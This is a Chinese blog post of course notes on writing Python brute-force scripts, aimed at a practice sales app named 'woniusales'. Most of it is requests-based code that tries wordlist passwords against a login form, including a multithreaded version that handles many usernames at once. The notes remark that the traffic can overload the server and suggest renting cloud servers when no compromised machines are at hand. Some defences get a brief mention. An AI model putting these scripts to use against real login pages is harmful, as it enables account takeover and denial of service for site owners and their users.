12-python编写暴力破解poc

已于 2024-05-06 18:02:34 修改
阅读量305 收藏 5
点赞数 4
文章标签: 安全 网络安全
于 2024-04-29 03:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/tianxiadiiw/article/details/138294176
版权

一、爆破MD5

场景:已知MD5加密字符串,如何得知明文?

解决方案:

算法碰撞,一串128位的MD5(32位16进制)其组合数量

字典碰撞,给定一个字典文件,读取里面的密码明文,再对其进行MD5,

再和目标字符串对比,如果相同,则明文找到。

二、爆破woniusales

1、验证登录请求

使用burp抓包,查看登录的数据怎么构造,以及响应的url地址

2、已知用户名,爆破密码

import time,requests
# 爆破Woniusales:用户名和密码都不知道,1、用户名已知,密码未知
def ws_01():
    with open('文件的位置') as file:
        pw_list = file.readline()
    url = ''
    count = 0
    for password in pw_list:
        data = {'username':'woniu','password':password.strip(),'verifycode':'0000'}
        resp = requests.post(url=url,data=data)     #去进行post请求
        if 'login-fail' not in resp.text:
            print(f"疑似破解成功,密码为:{password.strip()}")
            exit()
        count += 1
    print(f'共计尝试{count}次')


if __name__ == '__main__':
    # md5('cxcsd')
    ws_01()

3、未知用户名,未知密码爆破

# 未知用户名,未知密码,多线程并进行破解
#500用户,6000条密码,最多300万次登录操作,
# 同时,由于多线程并发登录,导致服务器压力倍增(DOS),进而导致服务器响应时间会显著变慢
# 如果服务器不小心崩溃,那么很有可能引起重视,进而检测访问日志,封锁IP,(DDOS可以更好模拟)

# 每一个用户一个线程,每个线程循环6000次
count = 0
def ws_thread(username):
    with open('密码文件的位置') as file:
        pw_list = file.readlines()
    url = 'http://'   # 这儿的路径是登录界面响应的界面
    global count
    for password in pw_list:
        data = {'username': username, 'password': password.strip(), 'verifycode': '0000'}
        resp = requests.post(url=url, data=data)  # 去进行post请求
        if 'login-fail' not in resp.text:
            print(f"疑似破解成功,密码为:{password.strip()}")
            exit()
        count += 1
    print(f'共计尝试{count}次')

# 如果用户字典有5000条数据,又该如何处理?
# 解决方案,每个线程处理十个用户
# 本题的核心:如何给多线程分配任务,此类思路可以解决大多数多线程的常规问题,比如多线程爬虫,扫描工作等。
def ws_thread_10():
    pass

if __name__ == '__main__':
    # 多线程,读取用户字典,并遍历获取用户名
    with open('用户文件所在的位置') as file:
        user_list = file.readlines()
    for username in user_list:
        # 这儿有多少个线程,我就并发多少个用户
        threading.Thread(target=ws_thread,args=(username.strip(),)).start()

采用多线程去处理大数据

# 如果用户字典有5000条数据,又该如何处理?
# 解决方案,每个线程处理十个用户
# 本题的核心:如何给多线程分配任务,此类思路可以解决大多数多线程的常规问题,比如多线程爬虫,扫描工作等。
def ws_thread_10(sublist):
    # 怎么去分配任务-->指派任务--》指派更加有规律的方式--》分类的方式
    #先进行列表的可行性分析
    # with open('用户文件') as file:
    #     user_list = file.readlines()
    # # print(user_list[0:10])  # 可以通过切片的方式进行操作
    # # print(user_list[10:20])
    # # print(user_list[20:30])
    # # # 通过列表切片的方式将列表分配到每一个小组里,每个小组10个用户
    # for i in range(0,len(user_list),10):  # 对列表进行切片处理分成一个子列表
    #     print(user_list[i:i+10])
    with open('密码文件的位置') as file:
        pw_list = file.readlines()

    for username in sublist:
        url = ''
        for password in pw_list:
            data = {'username': username.strip(), 'password': password.strip(), 'verifycode': '0000'}
            resp = requests.post(url=url, data=data)  # 去进行post请求
            if 'login-fail' not in resp.text:
                print(f"疑似破解成功,账号为{username.strip()}, 密码为:{password.strip()}")
                exit()



if __name__ == '__main__':
    # 每个线程负责10个用户
    with open("用户的位置") as file:
        user_list = file.readlines()

    for i in range(0,len(user_list),10):
        sublist = user_list[i:i+10]   # 设置子进程,核心点是切片,作为参数把列表传递过去
        threading.Thread(target=ws_thread_10,args=(sublist,)).start()

三、爆破条件与防范

1.登录成功或失败的条件可验证

2.服务器端允许多次失败登录而不会禁止

首先监控到登录的请求 ,查看通行的过程

查看登录是发送了那些字段,

查看登录后的响应,

从流量上来看DOS攻击和暴力破解特征是一样的

暴力破解的点

一、应用场景:

只要有密码的地方,均可以尝试使用爆破方案

二、应用条件:

爆破不受次数的限制,可以一直尝试,所以爆破的防护方案:次数限制,

没有肉鸡怎么办?

去云服务器平台临时租赁

爆破分类:

离线爆破

在线爆破

作业:如何爆破wifi?如何防护?

爆破WiFi简单粗暴的进入内网。

一个进程,的线程有限,如何能够提升并发能力呢?

1.将任务分配到不同电脑上,

2.在同一台电脑上运行多个程序。

xuzhuoyang
关注
  • 4
    点赞
  • 5
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
python 暴力破解wifi密码
03-19
通过字典,用python暴力破解wifi密码,大概一秒尝试一个字典信息。
common-python-lib-poc
03-21
这个压缩包"common-python-lib-poc-main"可能是该工具的主要执行文件或核心模块。 Python作为一款广泛使用的编程语言,在开发Web应用、数据分析、自动化等多个领域都有广泛应用。然而,随着其普及度的提高,安全...
python暴力破解代码
热门推荐
10-16 11万+
MySQL 数据库暴力破解代码 ··· -- coding: utf-8 -- import pymysql success = False f_user = open(‘username.txt’, ‘r’) f_pwd = open(‘password.txt’, ‘r’) lines_user = f_user.readlines() #读取出来是一个列表 lines_pwd = f_pw...
python暴力破解
qq_51768842的博客
03-16 5428
简单介绍利用python的itertools库,实现暴力破解
3-python实现暴力破解
m0_62978778的博客
12-28 828
3、获得HTTP响应,分析响应结果,看看有没有错误提示“Username and/or password incorrect.”2、HTTP连接到需要暴破的地址。与爬虫请求request方法类似。4、如果有提示,就继续下一次循环。5、如果没有,就代表暴破成功。1、从字典读取值,生成密码。
Python语言在黑客攻击中的应用
leah126的博客
10-28 634
网络安全行业产业以来,随即新增加了几十个网络安全行业岗位︰网络安全专家、网络安全分析师、安全咨询师、网络安全工程师、安全架构师、安全运维工程师、渗透工程师、信息安全管理员、数据安全工程师、网络安全运营工程师、网络安全应急响应工程师、数据鉴定师、网络安全产品经理、网络安全服务工程师、网络安全培训师、网络安全审计员、威胁情报分析工程师、灾难恢复专业人员、实战攻防专业人员…网上虽然也有很多的学习资源,但基本上都残缺不全的,这是我自己录的网安视频教程,上面路线图的每一个知识点,我都有配套的视频讲解。
Some-PoC-oR-ExP:各种漏洞poc、Exp的收集或编写
04-28
总结起来,"Some-PoC-oR-ExP"是一个集成了多种漏洞PoC和Exp的资源库,主要使用Python语言实现,适用于安全研究和教育。通过深入研究这些实例,我们可以增进对漏洞本质的理解,提高安全防护意识,并且掌握安全编程...
cve-2018-2893-poc
05-07
Python脚本`cve-2018-2893-poc.py`就是这样一个PoC,用于检测目标系统是否受此漏洞影响。用户可以运行此脚本,并提供目标WebLogic服务器的IP地址和POST数据,以尝试触发漏洞。 例如,命令行可能如下所示: ```bash ...
OpenWRT-Wifi-Clients-POC:POC 通过 ubus json rpc 从 openWRT 查询 WiFi 客户端
06-06
查询 OpenWRT WiFi 客户端这是 OpenWRT ubus JSON-RPC 接口的简单 POC,用于从正在运行的 hostapd 查询关联的 WiFi clinet。 这可以用作各种家庭自动化操作的触发器,例如如果每个人都“离开”(或每个人的电话都...
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用)
11-07
MS12-020漏洞各个版本PoC&EXP打包(含NC,亲测可用) [网上流传版]MS12-020 PoC[bug修正版 + 数据包nc发送版] [个人版]ms12-020 Ruby,Python,EXE,DAT,NC一应俱全
Python编写简单GET暴力破解
qq_50620293的博客
03-24 906
最近简单学习了一下python的request模块,虽说简单,但值得实践一下,记录一下过程 靶场为dvwa简单难度的暴力破解模块 python中的request包可以对网页发送请求以及接收回应,再结合循环,以此作为暴力破解的基础 第一步,获取url 首先dvwa的暴力破解模块是get请求,所以直接先随便提交一组数据,复制它的url即可。(post暴力破解之后再做研究) http://127.0.0.1/DVWA-master/vulnerabilities/brute/?username=admin&amp
python如何实现简单的暴力破解
最新发布
weixin_43305645的博客
07-30 999
该项目的核心是实现简单网页端的密码破解,主要是为了给没有基础的人,提供一个思路,了解这方面的攻防原理,实际用途不大,现在大部分有三代四代验证码,还有一些加密算法等,并不会像文章中这么简单的实现直接跑字典而获取密码。文章内的前后端是特意写的,需要源码的话,我到时候会把前后端放在文章底部。但这里源码的具体内容我不会进行讲解。
Python暴力破解密码
芊樱烛渊的博客
04-22 6154
一、导入包 此处我们需要用到itertools和zipfile两个包 import itertools import zipfile 我们先来简单认识一下itertools包的简单用法 digital_list=list(itertools.permutations(['0','1','2','3','4','5','6','7','8','9'],3)) d_list=[''.join(x) for x in digital_list] print(digital_list) print(d_
Python实现暴力破解有密码的zip文件
weixin_39098318的博客
03-20 1883
背景 今天朋友给我发了一个某游戏的兑换码,压缩文件发过来的。结果被加密了。wc?还说叫爸爸就给我密码?男人是这么容易像恶势力低头的?直接给你爆了好吧,小兔崽子。 一、思路 爆密码的思路其实都大同小异:无非就是字典爆破,就看你是有现成密码字典,还是自己生成密码字典,然后进行循环输入密码,直到输入正确位置。现在很多都有防爆破限制,根本无法进行暴力破解,但是似乎zip这种大家都是用比较简单的密码而且没有...
使用python暴力破解zip压缩包的密码
Jackey_Song的博客
02-26 1万+
使用python暴力破解zip压缩包的密码
Python 暴力破解密码字典生成代码,轻便,少占资源
wanghb221的博客
11-13 1104
本文对之前的密码生成的itertools.produc 和字典文件方法做了改进,可以用较小的负担完成。
学习Python渗透第十二天:用Python实现暴力破解
2203_75839317的博客
03-25 1274
接下来,我们来编写一个可以实现登录功能的Python程序,这里需要用到requests库,这是一个专门用来处理HTTP的库,利用这个库发起请求十分简单,例如我们需要发送POST请求,需要用到requests.post()函数,这个函数比较复杂,常用格式如下。
Python暴力破解密码 - 压缩包、web实战
we chat:玩转测试开发
11-08 5386
常规情况下,由于web自身的服务资源,带宽,吞吐率的原因,存在访问上线的情况,这和极端情况下本地直接即时访问,即时反馈的机制是完全不可等同的。另外暴力破解密码这种行为本身就是一个徘徊为灰色地带的,并且条件极其苛刻的情况下才有可能使用得上,这也是为了极少存在通过暴力破解密码从而找回或者攻陷入口的原因。4、执行结果:即只需要27秒左右即可破解6位数字密码的zip密码包。1、创建一个web服务并创建密码,运行。1、创建一个zip包,并设置是需要密码。2、手动解压的时候,确认是需要密码的。
利用Python暴力破解邻居家WiFi密码
weixin_45841831的博客
01-19 4万+
如觉得博主文章写的不错或对你有所帮助的话,还望大家多多支持呀!
cve-2019-6518编写poc
05-25
以下是一个简单的POC: ```html <!DOCTYPE html> <title>CVE-2019-6518 POC var spray = new Array(); var i = 0; for (; i ; i++) { spray[i] = new Uint32Array(0x1000); } var oobArray = new ...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值